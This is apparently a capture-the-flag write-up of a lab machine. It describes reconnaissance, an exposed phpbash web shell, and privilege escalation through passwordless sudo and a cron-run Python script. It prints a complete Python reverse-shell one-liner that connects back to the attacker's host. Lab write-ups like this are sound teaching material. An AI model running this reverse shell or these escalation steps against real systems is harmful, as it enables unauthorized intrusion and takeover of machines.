I began the box by first opening the IP address on a web browser to see if anything was there. I noticed it was a blog-style website and there was a single post with the title: phpbash.
I checked out the GitHub page and noticed that there was two files of interest in the main repository: phpbash.php and phpbash.min.php.
While this was all going down, I made sure to run a simple nmap scan to see if there were any other services running.
The scan revealed that there was only a single port open (port 80) and I was able to confirm that the most likely point of entry would be through the website (I was thinking of hidden files).
I ran a simple dirbuster scan for the files phpbash.php and phpbash.min.php and saw these files appear under 10.10.10.68/dev/. I navigated to phpbash.php as the name “bash” suggested a shell and was surprised to find that it actually gave me a web-based shell. I navigated to the the “/” directory and came across the “home” directory where I was able to find the user flag.
The next thing on my to-do list was to escalate from the web-bashed shell to a terminal. After looking around the list of services I could use very quickly, I found out that I could run python so I decided to create my reverse-shell using the popular python one-liner that allowed me to connect to the terminal on my Kali VM.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.107",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once on the terminal, I decided to snoop around to find possible entry points for privilege escalation. Running “sudo -l” showed me an interesting user that could run commands without a password.
From the / directory, I came across two folders that were noteworthy (scripts & root) which I could not access from the web-shell user so I decided to use the scriptmanager user to list the contents of the folder.
We can see that the test.py is owned by scriptmanager. The test.txt is owned by root but its content is generated from the python script. I had no idea where to go from here but as I was messing around with the text file, I noticed that after a certain period of time the file reset back to its original contents. From here, I was almost certain that a scheduled task was running this python script as root.
From this point there were multiple ways to get the root flag. One of the methods was to overwrite the script so that it opens up the flag from /root/flag.txt but this could/would expose/spoil the flag for people that might still be working on the box. Because of this, I decided that I would just create another reverse shell from the root user to retrieve the flag.
This was an easy but fun box with all the basic checks that should be done so it was good to get a refresher on these techniques.